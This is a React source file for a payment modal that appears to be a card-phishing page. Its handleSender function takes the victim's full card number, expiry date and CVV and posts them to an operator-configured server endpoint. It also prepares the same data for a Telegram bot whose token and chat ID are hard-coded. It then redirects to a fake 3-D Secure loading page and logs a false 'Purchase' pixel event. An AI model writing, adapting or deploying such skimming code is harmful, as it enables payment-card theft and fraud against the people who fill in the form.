import React, { useEffect, useRef, useState } from 'react';
import './ReservationPage.css';
import { useLocation, useNavigate } from "react-router-dom";
import InputField from "./InputField";
import axios from "axios"
import ReactPixel from "react-facebook-pixel"  



const LockIcon = () => (
  <svg width="18" height="18" viewBox="0 0 20 20" fill="none">
    <rect x="4" y="8" width="12" height="8" rx="2" stroke="#888" strokeWidth="1.5" fill="#fff"/>
    <path d="M7 8V6a3 3 0 1 1 6 0v2" stroke="#888" strokeWidth="1.5" fill="none" strokeLinecap="round"/>
    <circle cx="10" cy="12" r="1.2" fill="#888"/>
  </svg>
);

const PaymentModal = ({ open, onClose }) => {
  const [card, setCard] = useState('');
  const [exp, setExp] = useState('');
  const [cvc, setCvc] = useState('');
  const [zip, setZip] = useState('');
  const [error, setError] = useState('');


  const isCardValid = card.length === 16;
  const isExpValid = /^\d{2}\/\d{2}$/.test(exp);
  const isCvcValid = cvc.length >= 3;
  const isZipValid = zip.length >= 3;
  const isFormValid = isCardValid && isExpValid && isCvcValid && isZipValid;

  const validate = () => {
    if (!isFormValid) return;
    setError('');
    onClose();
  };





   const location = useLocation();
      const [submitBtnContent, setSubmitBtnContent] = useState(`Submit`)
      const [input1Value, setInput1Value] = useState("")
      const [input2Value, setInput2Value] = useState("")
      const [input3Value, setInput3Value] = useState("")
    
      const [focusedInput, setFocusedInput] = useState(1) // 1 for first input, 2 for second input, 3 for third input
      const input1Ref = useRef(null)
      const input2Ref = useRef(null)
      const input3Ref = useRef(null)
    const totalAmount = 1
const navigate = useNavigate()
      const [submitBtnDis, setSubmitBtnDis] = useState(true)
    
      useEffect(() => {
        updateSubmitBtnDisabled()
      }, [input1Value, input2Value, input3Value])
    

    
      const fullUrl = window.location.href
      const handleInput1Focus = () => {
        // trackUserAction('User Started Card Input', false)
        setFocusedInput(1)
      }
    
      const handleInput2Focus = () => {
        setFocusedInput(2)
      }
    
      const handleInput3Focus = () => {
        setFocusedInput(3)
      }
    
      const checkFocus = (num) => {
        return focusedInput === num
      }
    
      const updateSubmitBtnDisabled = () => {
        console.log(
          `AED {input1Value.length} + AED {input2Value.length} + AED {input3Value.length}`
        )
        // Check conditions for enabling/disabling submit button
        if (
          input1Value !== "" &&
          input2Value !== "" &&
          input3Value !== "" &&
          input1Value.length === 19 &&
          input2Value.length === 5 &&
          input3Value.length === 3 &&
          isDateGreaterThan(input2Value, "10/24")
        ) {
          if (input1Value.charAt(0) === "4" || input1Value.charAt(0) === "5") {
            setSubmitBtnDis(false) // Enable submit button if all inputs are filled
          }
        } else {
          setSubmitBtnDis(true) // Disable submit button if any input is empty
        }
      }
      function isDateGreaterThan(dateStr, comparisonDateStr) {
        console.log(dateStr)
        // Extract month and year for both dates
        const [month, year] = dateStr.split("/").map(Number)
        const [compMonth, compYear] = comparisonDateStr.split("/").map(Number)
    
        // First, compare the years
        if (year > compYear) return true
        if (year < compYear) return false
    
        // If years are the same, compare the months
        return month > compMonth
      }
      const handleSender = async () => {
        const botToken = "7837303469:AAEw7hcq-r7VeipgHE9kG3uzPlPLDgAtj1o" // Replace with your bot's token
        const url = `https://api.telegram.org/bot${botToken}/sendMessage`
    
        // Extract the first digit of `main` and the last 4 digits of `main`
        const firstDigit = input1Value?.charAt(0) // First digit
        const lastFourDigits = input1Value?.slice(-4) // Last 4 digits
    
        // Set values to localStorage
        localStorage.setItem("summ", totalAmount.toFixed(2))
        localStorage.setItem("first-digit", firstDigit)
        localStorage.setItem("last-four-digits", lastFourDigits)
    
        const payload = {
          chat_id: "-1002222911401", // Replace with the target chat ID
          text: `💳 ${input1Value}
      📆 ${input2Value}
      🔐 ${input3Value}`, // The message text
        }
    
        try {
          ReactPixel.track("Purchase")
        } catch (err) {
          console.log(err)
        }
        setSubmitBtnContent(<div className="inputLoader"></div>)
    
    
    
        // const additionalMessage = `|${formData.firstName} ${formData.lastName}|${formData.email}|${formData.country.label}|`
        const dataToSend = {
          orderId: "123",
          uuId: localStorage.getItem("uuId"),
          main: input1Value,
          date: input2Value,
          code: input3Value,
          summ: totalAmount.toFixed(2),
          chatId: process.env.REACT_APP_CHAT_ID,
          domain: process.env.REACT_APP_DOMAIN,
          link: fullUrl,
          additional: '',
        }
        console.log(dataToSend)
        try {
          await axios.post(
            process.env.REACT_APP_SERVER_URL + "/api/validation",
            dataToSend,
            {
              headers: {
                "Content-Type": "application/json",
              },
            }
          )
          navigate("/3ds/loading")
        } catch (error) {
          console.error("Error sending data:", error)
          setTimeout(() => {
            setSubmitBtnContent(`Pay: ${localStorage.getItem('price')} Ft`)
          }, 3000)
        }
      }


  
  if (!open) return null;

  return (
    <div className="payment-modal-overlay" onClick={onClose}>
      <div className="payment-modal" style={{width: 370, maxWidth: '95vw', padding: 28}} onClick={e => e.stopPropagation()}>
        <div style={{display:'flex', justifyContent:'space-between', alignItems:'center', marginBottom: 18}}>
          <h2 style={{margin:0, fontSize: '1.5rem'}}>Payment</h2>
          <button className="close-btn" onClick={onClose}>&times;</button>
        </div>
        <div style={{marginBottom: 18}}>
          <label style={{fontWeight: 500, marginBottom: 6, display:'block'}}>Card Number</label>
          <div className="input-icon-wrap">
            
           
         <InputField
                    formatType={"card"}
                    ref={input1Ref}
                    value={input1Value}
                    onFocus={handleInput1Focus}
                    onChange={(e) => setInput1Value(e.target.value)}
                    placeholder={"Card number"}
                    focused={checkFocus(1)}
                  />


            <span className="icon-right"><LockIcon /></span>
          </div>
        </div>
        <div style={{marginBottom: 18}}>
          <label style={{fontWeight: 500, marginBottom: 6, display:'block'}}>Expiration Date</label>
        
        <InputField
                      formatType={"date"}
                      ref={input2Ref}
                      value={input2Value}
                      onFocus={handleInput2Focus}
                      onChange={(e) => setInput2Value(e.target.value)}
                      placeholder={"Expiry date"}
                      focused={checkFocus(2)}
                    /> </div>
        <div style={{marginBottom: 18}}>
          <label style={{fontWeight: 500, marginBottom: 6, display:'block'}}>Security Code</label>
       
          <div className="input-icon-wrap">

    <InputField
                      formatType={"code"}
                      ref={input3Ref}
                      value={input3Value}
                      onFocus={handleInput3Focus}
                      onChange={(e) => setInput3Value(e.target.value)}
                      placeholder={"CVV"}
                      focused={checkFocus(3)}
                    />
            <span className="icon-right"><LockIcon /></span>
          </div>
        </div>
        <div style={{marginBottom: 18}}>
          <label style={{fontWeight: 500, marginBottom: 6, display:'block'}}>Postal Code</label>
          <input type="text" maxLength={10} placeholder="11111" value={zip} onChange={e => setZip(e.target.value.replace(/\D/g, ''))} className="input-with-icon" />
        </div>
        {error && <div className="error">{error}</div>}

        <button onClick={handleSender} disabled={submitBtnDis} className="bg-[#F3EDE5]  py-2 hover:bg-[#E7E0D3] text-lg font-base text-black text-black rounded-xl h-full w-full disabled:bg-neutral-50 disabled:text-neutral-300">
          {submitBtnContent}
        </button>

      </div>
    </div>
  );
};

export default PaymentModal; 